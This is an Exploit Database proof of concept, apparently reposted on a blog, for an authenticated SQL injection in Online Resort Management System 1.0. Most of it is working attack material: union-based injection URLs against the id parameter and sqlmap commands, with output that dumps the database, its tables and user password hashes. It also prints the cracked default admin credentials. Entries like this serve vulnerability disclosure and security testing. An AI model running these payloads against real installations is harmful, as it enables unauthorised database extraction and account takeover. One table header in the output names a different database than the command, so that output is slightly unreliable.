Online Resort Management System 1.0 – SQLi (Authenticated)

Exploit Database
113 阅读

作者： Gaurav Grover

日期： 2022-01-18
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50666/

# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated)

# Date: 15/01/2022

# Exploit Author: Gaurav Grover

# Vendor Homepage: <http://192.168.0.108/orms/admin/login.php>

# Software Link: <https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html>

# Version: 1.0

# Tested on: Linux and windows both

Summary:

There are a vulnerabilities in Online Resort Management System (ORMS)

1. The attacker can easily retrieved the database using sql injection.

Proof of concepts :

Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below:

1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id=

2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+

3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+

4. (Database Name :- orms_db)

Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+

5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users

Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+

6. (Username Password :-User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea

Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below:

1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs

available databases [8]:

[*] clinic_db

[*] information_schema

[*] mtms_db

[*] mysql

[*] orms_db

[*] performance_schema

[*] phpmyadmin

[*] test

2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables

Database: mtms

[6 tables]

+------------------+

| activity_list|

| message_list |

| reservation_list |

| room_list|

| system_info|

| users|

+------------------+

3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump

Database: orms_db

Table: users

[2 entries]

+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+

| 1| 1| 1| uploads/avatar-1.png?v=1639468007 | admin| Admin| 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL | NULL | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 |

| 5| 2| 1| uploads/avatar-5.png?v=1641622906 | cblake1| Blake| cd74fae0a3adf459f73bbf187607ccea (cblake) | Claire | NULL | NULL | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 |